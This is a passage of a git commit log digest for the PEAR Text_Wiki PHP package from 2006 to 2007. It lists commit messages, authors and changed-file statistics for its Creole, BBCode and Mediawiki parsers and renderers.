 create mode 100644 Text/Wiki/Parse/Creole/Heading.php
 create mode 100644 Text/Wiki/Parse/Creole/Horiz.php
 create mode 100644 Text/Wiki/Parse/Creole/Image.php
 create mode 100644 Text/Wiki/Parse/Creole/List.php
 create mode 100644 Text/Wiki/Parse/Creole/Newline.php
 create mode 100644 Text/Wiki/Parse/Creole/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Creole/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Creole/Preformatted.php
 create mode 100644 Text/Wiki/Parse/Creole/Strong.php
 create mode 100644 Text/Wiki/Parse/Creole/Table.php
 create mode 100644 Text/Wiki/Parse/Creole/Tighten.php
 create mode 100644 Text/Wiki/Parse/Creole/Trim.php
 create mode 100644 Text/Wiki/Parse/Creole/Tt.php
 create mode 100644 Text/Wiki/Parse/Creole/Url.php
 create mode 100644 Text/Wiki/Parse/Creole/Wikilink.php
 create mode 100644 Text/Wiki/Render/Creole.php
 create mode 100644 Text/Wiki/Render/Creole/Address.php
 create mode 100644 Text/Wiki/Render/Creole/Anchor.php
 create mode 100644 Text/Wiki/Render/Creole/Blockquote.php
 create mode 100644 Text/Wiki/Render/Creole/Bold.php
 create mode 100644 Text/Wiki/Render/Creole/Box.php
 create mode 100644 Text/Wiki/Render/Creole/Break.php
 create mode 100644 Text/Wiki/Render/Creole/Center.php
 create mode 100644 Text/Wiki/Render/Creole/Code.php
 create mode 100644 Text/Wiki/Render/Creole/Colortext.php
 create mode 100644 Text/Wiki/Render/Creole/Deflist.php
 create mode 100644 Text/Wiki/Render/Creole/Delimiter.php
 create mode 100644 Text/Wiki/Render/Creole/Embed.php
 create mode 100644 Text/Wiki/Render/Creole/Emphasis.php
 create mode 100644 Text/Wiki/Render/Creole/Freelink.php
 create mode 100644 Text/Wiki/Render/Creole/Function.php
 create mode 100644 Text/Wiki/Render/Creole/Heading.php
 create mode 100644 Text/Wiki/Render/Creole/Horiz.php
 create mode 100644 Text/Wiki/Render/Creole/Html.php
 create mode 100644 Text/Wiki/Render/Creole/Image.php
 create mode 100644 Text/Wiki/Render/Creole/Include.php
 create mode 100644 Text/Wiki/Render/Creole/Interwiki.php
 create mode 100644 Text/Wiki/Render/Creole/Italic.php
 create mode 100644 Text/Wiki/Render/Creole/List.php
 create mode 100644 Text/Wiki/Render/Creole/Newline.php
 create mode 100644 Text/Wiki/Render/Creole/Paragraph.php
 create mode 100644 Text/Wiki/Render/Creole/Phplookup.php
 create mode 100644 Text/Wiki/Render/Creole/Prefilter.php
 create mode 100644 Text/Wiki/Render/Creole/Preformatted.php
 create mode 100644 Text/Wiki/Render/Creole/Raw.php
 create mode 100644 Text/Wiki/Render/Creole/Revise.php
 create mode 100644 Text/Wiki/Render/Creole/Strong.php
 create mode 100644 Text/Wiki/Render/Creole/Subscript.php
 create mode 100644 Text/Wiki/Render/Creole/Superscript.php
 create mode 100644 Text/Wiki/Render/Creole/Table.php
 create mode 100644 Text/Wiki/Render/Creole/Tighten.php
 create mode 100644 Text/Wiki/Render/Creole/Toc.php
 create mode 100644 Text/Wiki/Render/Creole/Tt.php
 create mode 100644 Text/Wiki/Render/Creole/Underline.php
 create mode 100644 Text/Wiki/Render/Creole/Url.php
 create mode 100644 Text/Wiki/Render/Creole/Wikilink.php
 create mode 100644 packageCreole.xml

http://github.com/horde/horde/commit/d8bcd3477eef4540e1945c13bd27110602367f81

-----------------------------------------------------------------------

commit 88c63a66555e803a1fda6417e930ba842bcee6fd
Author: Michele Tomaiuolo 
Date:   Mon Oct 23 22:27:40 2006 +0000

    start/end tokens
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222279 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Url.php | 38 ++++++++++++++++++++++++++++----------
 1 file changed, 28 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/88c63a66555e803a1fda6417e930ba842bcee6fd

-----------------------------------------------------------------------

commit 814404d136369efdc42d5136402bc647c38184ba
Author: Michele Tomaiuolo 
Date:   Tue Oct 24 07:41:19 2006 +0000

    check-inner-tags counts open/end tags
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222292 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/814404d136369efdc42d5136402bc647c38184ba

-----------------------------------------------------------------------

commit 0f3dbfb9624892ea5c9c1bde507b088c59ed6770
Author: Michele Tomaiuolo 
Date:   Tue Oct 24 14:53:32 2006 +0000

    *** empty log message ***
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222304 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Url.php   | 49 +++++++++++++--------------
 Text/Wiki/Render/Cowiki/Url.php  | 39 ++++++++++++++++------
 Text/Wiki/Render/Creole/Url.php  | 17 +++++-----
 Text/Wiki/Render/Docbook/Url.php | 30 +++++++++++------
 Text/Wiki/Render/Doku/Url.php    | 39 +++++++++++++++-------
 Text/Wiki/Render/Latex/Url.php   | 26 +++++++++------
 Text/Wiki/Render/Plain/Url.php   | 22 +++++++-----
 Text/Wiki/Render/Tiki/Url.php    | 32 +++++++++++++-----
 Text/Wiki/Render/Xhtml/Url.php   | 16 +++------
 tests/Cowiki_Render_Url.phpt     | 20 +++++++++++
 tests/Creole_Parse_Url.phpt      | 72 ++++++++++++++++++++++++++++++++++++++++
 tests/Creole_Render_Url.phpt     | 20 +++++++++++
 tests/Docbook_Render_Url.phpt    | 20 +++++++++++
 tests/Doku_Render_Url.phpt       | 20 +++++++++++
 tests/Latex_Render_Url.phpt      | 21 ++++++++++++
 tests/Plain_Render_Url.phpt      | 20 +++++++++++
 tests/Tiki_Render_Url.phpt       | 20 +++++++++++
 tests/Xhtml_Render_Url.phpt      | 20 +++++++++++
 18 files changed, 399 insertions(+), 104 deletions(-)
 create mode 100644 tests/Cowiki_Render_Url.phpt
 create mode 100644 tests/Creole_Parse_Url.phpt
 create mode 100644 tests/Creole_Render_Url.phpt
 create mode 100644 tests/Docbook_Render_Url.phpt
 create mode 100644 tests/Doku_Render_Url.phpt
 create mode 100644 tests/Latex_Render_Url.phpt
 create mode 100644 tests/Plain_Render_Url.phpt
 create mode 100644 tests/Tiki_Render_Url.phpt
 create mode 100644 tests/Xhtml_Render_Url.phpt

http://github.com/horde/horde/commit/0f3dbfb9624892ea5c9c1bde507b088c59ed6770

-----------------------------------------------------------------------

commit 593bcde3d7f1613d95bf1261f69055e5fd0591e6
Author: bertrand Gugger 
Date:   Fri Oct 27 00:54:31 2006 +0000

    Back lead , we need to kill recursive (?R)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222408 c90b9560-bf6c-de11-be94-00142212c4b1

 packageBBCode.xml | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/593bcde3d7f1613d95bf1261f69055e5fd0591e6

-----------------------------------------------------------------------

commit b7594ba8ce2bd96907837eae2f30da698c49be8f
Author: Justin Patrin 
Date:   Fri Oct 27 18:42:52 2006 +0000

    Add balanced token checking
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222441 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 13 +++++++++++++
 1 file changed, 13 insertions(+)

http://github.com/horde/horde/commit/b7594ba8ce2bd96907837eae2f30da698c49be8f

-----------------------------------------------------------------------

commit d5811d1734ac15762353e556b36aafb472a8affa
Author: bertrand Gugger 
Date:   Sat Oct 28 16:32:42 2006 +0000

    a test for [list] in BBCode subdir (inspired from Creole)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222478 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/BBCode/7908.phpt | 244 +++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 244 insertions(+)
 create mode 100644 tests/BBCode/7908.phpt

http://github.com/horde/horde/commit/d5811d1734ac15762353e556b36aafb472a8affa

-----------------------------------------------------------------------

commit bf707e6d4ffdc5fab3a89e7b29908af99482de96
Author: Michele Tomaiuolo 
Date:   Thu Nov 2 13:08:16 2006 +0000

    *** empty log message ***
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 222675 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCreole.xml | 44 ++++++++++++++++++++++----------------------
 1 file changed, 22 insertions(+), 22 deletions(-)

http://github.com/horde/horde/commit/bf707e6d4ffdc5fab3a89e7b29908af99482de96

-----------------------------------------------------------------------

commit 93d83af234932b2530c8ea3193ce35af78b5e771
Author: Moritz Venn 
Date:   Thu Nov 30 10:31:36 2006 +0000

    Add file:// protocol to Url-Parser, will most likely be added as an option later on (as in Mediawiki). Closes #9383
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224069 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Url.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/93d83af234932b2530c8ea3193ce35af78b5e771

-----------------------------------------------------------------------

commit 36d1c731625df67b8098d0206ebb2c9099c40b23
Author: Moritz Venn 
Date:   Tue Dec 5 14:46:59 2006 +0000

    dunno if someone ever used this, but has been broken for quite some time.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224398 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Wikilink.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/36d1c731625df67b8098d0206ebb2c9099c40b23

-----------------------------------------------------------------------

commit 2fa2440557619889fd36bab96cbaf816569de51e
Author: Justin Patrin 
Date:   Thu Dec 7 06:53:14 2006 +0000

    Byg #7320 use UTF-8 syntax instead of "extended"
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224519 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Cowiki/Wikilink.php  | 5 +++++
 Text/Wiki/Parse/Default/Freelink.php | 4 ++--
 Text/Wiki/Parse/Default/Wikilink.php | 5 +++++
 Text/Wiki/Parse/Doku/Freelink.php    | 4 ++--
 Text/Wiki/Parse/Doku/Wikilink.php    | 3 ++-
 Text/Wiki/Parse/Tiki/Wikilink.php    | 5 +++++
 6 files changed, 21 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/2fa2440557619889fd36bab96cbaf816569de51e

-----------------------------------------------------------------------

commit fa84ae37f4fba43b7085a3febc632847fc51ad64
Author: Justin Patrin 
Date:   Thu Dec 7 06:58:07 2006 +0000

    Combine UTF-8 and non-UTF-8 regexes....this will probably fail horribly
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224520 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Cowiki/Wikilink.php  | 11 +++--------
 Text/Wiki/Parse/Default/Freelink.php |  4 ++--
 Text/Wiki/Parse/Default/Wikilink.php | 11 +++--------
 Text/Wiki/Parse/Doku/Freelink.php    |  4 ++--
 Text/Wiki/Parse/Doku/Wikilink.php    |  3 +--
 Text/Wiki/Parse/Tiki/Freelink.php    |  4 ++--
 Text/Wiki/Parse/Tiki/Wikilink.php    | 11 +++--------
 7 files changed, 16 insertions(+), 32 deletions(-)

http://github.com/horde/horde/commit/fa84ae37f4fba43b7085a3febc632847fc51ad64

-----------------------------------------------------------------------

commit 7676d364371ff1787f73bbee9aefb1891fc8aad1
Author: Justin Patrin 
Date:   Thu Dec 7 07:37:06 2006 +0000

    Only use \p is ext_chars is on. This should be switched to be turn on utf8...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224524 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Freelink.php | 10 +++++++---
 Text/Wiki/Parse/Tiki/Freelink.php    | 10 +++++++---
 2 files changed, 14 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/7676d364371ff1787f73bbee9aefb1891fc8aad1

-----------------------------------------------------------------------

commit bfe7f95adc022321e31287cef41fb1ec68254719
Author: Justin Patrin 
Date:   Thu Dec 7 07:47:18 2006 +0000

    Add another UTF-8-ism
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224525 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Wikilink.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/bfe7f95adc022321e31287cef41fb1ec68254719

-----------------------------------------------------------------------

commit 427cfcda1c79c4b47a3837d2b8bbb9c99a2b9484
Author: Justin Patrin 
Date:   Fri Dec 8 08:23:51 2006 +0000

    Bug #7320 add a new utf-8 parse option for Wikilink and Freelink
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224598 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Cowiki/Wikilink.php  | 23 +++++++++++++--------
 Text/Wiki/Parse/Default/Freelink.php |  7 +++++--
 Text/Wiki/Parse/Default/Wikilink.php | 25 ++++++++++++++---------
 Text/Wiki/Parse/Doku/Freelink.php    | 39 +++---------------------------------
 Text/Wiki/Parse/Doku/Wikilink.php    | 11 ++++++----
 Text/Wiki/Parse/Tiki/Freelink.php    |  7 +++++--
 Text/Wiki/Parse/Tiki/Wikilink.php    | 17 +++++++++++-----
 7 files changed, 63 insertions(+), 66 deletions(-)

http://github.com/horde/horde/commit/427cfcda1c79c4b47a3837d2b8bbb9c99a2b9484

-----------------------------------------------------------------------

commit 71b84a40e27b278512743f5c979f6372dd998f3c
Author: Justin Patrin 
Date:   Fri Dec 8 08:30:37 2006 +0000

    Bug #6292 force headings and hrs to have extra newlines around them to avoid them being in paragraph tags (thanks to )
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224599 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Prefilter.php | 6 ++++++
 1 file changed, 6 insertions(+)

http://github.com/horde/horde/commit/71b84a40e27b278512743f5c979f6372dd998f3c

-----------------------------------------------------------------------

commit 1d4c9eb3373ed1a146289b7e648d69afeeb20267
Author: Justin Patrin 
Date:   Fri Dec 8 21:25:24 2006 +0000

    sprintf if slow
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 224670 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/1d4c9eb3373ed1a146289b7e648d69afeeb20267

-----------------------------------------------------------------------

commit 94e02b66238643f1f36081026260b5ac4f8154a1
Author: bertrand Gugger 
Date:   Wed Dec 20 22:29:59 2006 +0000

    Back lead
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 225413 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/94e02b66238643f1f36081026260b5ac4f8154a1

-----------------------------------------------------------------------

commit e261c5ec85172045ca0a9e1de4d32a85d2112631
Author: bertrand Gugger 
Date:   Fri Dec 22 09:16:24 2006 +0000

    In case of url with description, let the description parsable (#9393)
    Added a corresponding line in BBtest.txt
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 225554 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Url.php | 24 ++++++++++++++++++------
 doc/BBtest.txt                 |  1 +
 2 files changed, 19 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/e261c5ec85172045ca0a9e1de4d32a85d2112631

-----------------------------------------------------------------------

commit c5fdade643c027d2e3377503312ec36ebc716a3f
Author: bertrand Gugger 
Date:   Fri Dec 22 14:43:06 2006 +0000

    a !empty() intead of array_key_exists() , maybe dangerous
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 225566 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/List.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/c5fdade643c027d2e3377503312ec36ebc716a3f

-----------------------------------------------------------------------

commit 8eadd200a06d051246e496c4e2ad01a95342d98a
Author: bertrand Gugger 
Date:   Fri Dec 22 23:49:32 2006 +0000

    Prepared release , bug fixing and warning people about pcre's limitations.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 225597 c90b9560-bf6c-de11-be94-00142212c4b1

 packageBBCode.xml | 29 ++++++++++++++++++++++-------
 1 file changed, 22 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/8eadd200a06d051246e496c4e2ad01a95342d98a

-----------------------------------------------------------------------

commit 5f25651beba7d0c9a8d4648f4704f42c5ae07bfa
Author: bertrand Gugger 
Date:   Sat Dec 23 02:44:22 2006 +0000

    Generated with pear convert , back added cvs tag , removed php dependency
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 225607 c90b9560-bf6c-de11-be94-00142212c4b1

 packageBBCode2.xml | 143 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 143 insertions(+)
 create mode 100644 packageBBCode2.xml

http://github.com/horde/horde/commit/5f25651beba7d0c9a8d4648f4704f42c5ae07bfa

-----------------------------------------------------------------------

commit 44439b89cef212a1b1a653087aba6c5fd4712606
Author: bertrand Gugger 
Date:   Sat Dec 23 02:55:18 2006 +0000

    pear package needs the php dependency, put it back
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 225609 c90b9560-bf6c-de11-be94-00142212c4b1

 packageBBCode2.xml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/44439b89cef212a1b1a653087aba6c5fd4712606

-----------------------------------------------------------------------

commit fba9acea26ed88d53113bad520b80def0e0619de
Author: Justin Patrin 
Date:   Tue Jan 2 18:53:43 2007 +0000

    Update for release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 226273 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCowiki.xml | 14 +++++++++-----
 1 file changed, 9 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/fba9acea26ed88d53113bad520b80def0e0619de

-----------------------------------------------------------------------

commit 44fa4e612442950fd010007e97c8f051fb8e20a3
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 09:33:00 2007 +0000

    making the parser compliant with version 0.4 of specs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228638 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Creole.php                   |  4 +-
 Text/Wiki/Parse/Creole/Blockquote.php  |  2 +-
 Text/Wiki/Parse/Creole/Break.php       | 72 ++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Creole/Newline.php     |  5 +--
 Text/Wiki/Parse/Creole/Superscript.php | 75 ++++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/Creole/Trim.php        |  4 ++
 Text/Wiki/Render/Xhtml/Address.php     | 54 ++++++++++++++++++++++++
 7 files changed, 211 insertions(+), 5 deletions(-)
 create mode 100644 Text/Wiki/Parse/Creole/Break.php
 create mode 100644 Text/Wiki/Parse/Creole/Superscript.php
 create mode 100644 Text/Wiki/Render/Xhtml/Address.php

http://github.com/horde/horde/commit/44fa4e612442950fd010007e97c8f051fb8e20a3

-----------------------------------------------------------------------

commit 3de1e75694c3c97b2b8cb17651c3d0d6431c5f8c
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 09:57:36 2007 +0000

    making creole parser compliant with version 0.4 of specs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228641 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Heading.php |  2 +-
 package.xml                        |  3 ++-
 package2.xml                       |  1 +
 packageCreole.xml                  | 17 +++++++++++++----
 4 files changed, 17 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/3de1e75694c3c97b2b8cb17651c3d0d6431c5f8c

-----------------------------------------------------------------------

commit a4af2669cab5f2631fa2bf3327e6b18b3132fede
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 10:09:45 2007 +0000

    making creole parser compliant with version 0.4 of specs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228642 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCreole.xml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/a4af2669cab5f2631fa2bf3327e6b18b3132fede

-----------------------------------------------------------------------

commit 20327d62500a94f884a531ebedb90df8e80f2f7a
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 10:11:19 2007 +0000

    making creole parser compliant with version 0.4 of specs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228643 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCreole.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/20327d62500a94f884a531ebedb90df8e80f2f7a

-----------------------------------------------------------------------

commit 2745f0073f1c591d81dc95712b771ab43e021bb1
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 10:25:28 2007 +0000

    making creole parser compliant with version 0.4 of specs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228645 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Trim.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/2745f0073f1c591d81dc95712b771ab43e021bb1

-----------------------------------------------------------------------

commit f528b052d359aedf5985245b045401731f336a0d
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 10:26:12 2007 +0000

    making creole parser compliant with version 0.4 of specs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228646 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Trim.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/f528b052d359aedf5985245b045401731f336a0d

-----------------------------------------------------------------------

commit 8bdaec068e9c6d09d43ef095f1ae6babc4c527dc
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 10:37:10 2007 +0000

    changed version to 0.4.1
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228648 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCreole.xml | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)

http://github.com/horde/horde/commit/8bdaec068e9c6d09d43ef095f1ae6babc4c527dc

-----------------------------------------------------------------------

commit 25ee34040b4d69a8b31097d7221af802235a0dd8
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 10:50:00 2007 +0000

    ordinal numbers are automatically superscripted (1st, 2nd etc.)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228651 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Creole/Trim.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/25ee34040b4d69a8b31097d7221af802235a0dd8

-----------------------------------------------------------------------

commit eb3fc5b6037069ee6baf66d2e9fd496b8b996599
Author: Michele Tomaiuolo 
Date:   Thu Feb 1 11:35:53 2007 +0000

    bug-fix: 
now out of

git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228654 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Horiz.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/eb3fc5b6037069ee6baf66d2e9fd496b8b996599 ----------------------------------------------------------------------- commit a2a20c10050b10cd9eebdf08ed9aea5822fe1167 Author: Michele Tomaiuolo Date: Thu Feb 1 13:22:36 2007 +0000 2 backslashes are needed git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228659 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Break.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/a2a20c10050b10cd9eebdf08ed9aea5822fe1167 ----------------------------------------------------------------------- commit 9bcbbaa89f2952dd4d384238601ca8880d45f9d1 Author: Michele Tomaiuolo Date: Thu Feb 1 13:45:20 2007 +0000 bug-fix: text defaults to url git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228660 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Url.php | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/9bcbbaa89f2952dd4d384238601ca8880d45f9d1 ----------------------------------------------------------------------- commit 69249fb6e4508ba75d34f19eff4e30457f884db5 Author: Michele Tomaiuolo Date: Thu Feb 1 21:21:04 2007 +0000 comment about newlines git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228688 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Creole.php | 3 +++ 1 file changed, 3 insertions(+) http://github.com/horde/horde/commit/69249fb6e4508ba75d34f19eff4e30457f884db5 ----------------------------------------------------------------------- commit 1b5a63a3fc66ddd30baaa3a42ec4f28983d16d3e Author: Michele Tomaiuolo Date: Thu Feb 1 21:27:32 2007 +0000 changed version to 0.4.2 git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 228690 c90b9560-bf6c-de11-be94-00142212c4b1 packageCreole.xml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) http://github.com/horde/horde/commit/1b5a63a3fc66ddd30baaa3a42ec4f28983d16d3e ----------------------------------------------------------------------- commit 1a1b12b17685a1e504b2e94b68da5f793efdd72a Author: Michele Tomaiuolo Date: Wed Feb 7 13:40:16 2007 +0000 removed htmlentities git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 229274 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Preformatted.php | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/1a1b12b17685a1e504b2e94b68da5f793efdd72a ----------------------------------------------------------------------- commit 8ef4d020e69b11ecc94db7bbdb4fdfc7122b0aba Author: Michele Tomaiuolo Date: Wed Feb 7 13:40:44 2007 +0000 output goes through textEncode git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 229275 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Xhtml/Preformatted.php | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/8ef4d020e69b11ecc94db7bbdb4fdfc7122b0aba ----------------------------------------------------------------------- commit 038ac2e1fb01b199b594c5b6c33d75f64e5fadb1 Author: Michele Tomaiuolo Date: Wed Feb 7 13:46:26 2007 +0000 question mark for ungreedy regexp git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 229276 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Tt.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/038ac2e1fb01b199b594c5b6c33d75f64e5fadb1 ----------------------------------------------------------------------- commit 537b86092173930f65e6dd8065376c59411329c9 Author: Michele Tomaiuolo Date: Wed Feb 14 13:46:17 2007 +0000 include trailing braces git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 229793 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Parse/Creole/Tt.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) http://github.com/horde/horde/commit/537b86092173930f65e6dd8065376c59411329c9 ----------------------------------------------------------------------- commit a420458d8470e66553c3837e9b75f808c9a1e0f5 Author: Michele Tomaiuolo Date: Mon Feb 19 08:50:22 2007 +0000 allows specifying class in options git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 230211 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Xhtml/Blockquote.php | 3 +++ 1 file changed, 3 insertions(+) http://github.com/horde/horde/commit/a420458d8470e66553c3837e9b75f808c9a1e0f5 ----------------------------------------------------------------------- commit cb2051304185bb8bb7542e7babaa38811132f956 Author: Michele Tomaiuolo Date: Mon Feb 19 08:51:19 2007 +0000 allow specifying a class in conf - if a class is specified, no style is inlined git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 230212 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Xhtml/Center.php | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) http://github.com/horde/horde/commit/cb2051304185bb8bb7542e7babaa38811132f956 ----------------------------------------------------------------------- commit 26e3e3b4f5e5b5786121cd71a6d05774bdcdbb9c Author: Michele Tomaiuolo Date: Mon Feb 19 08:54:08 2007 +0000 aligning to creole 0.5 git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 230213 c90b9560-bf6c-de11-be94-00142212c4b1 Text/Wiki/Render/Creole/Blockquote.php | 24 ++++++++++++++++++------ Text/Wiki/Render/Creole/Center.php | 2 +- Text/Wiki/Render/Creole/Heading.php | 11 ++++++++--- Text/Wiki/Render/Creole/Raw.php | 5 ++++- 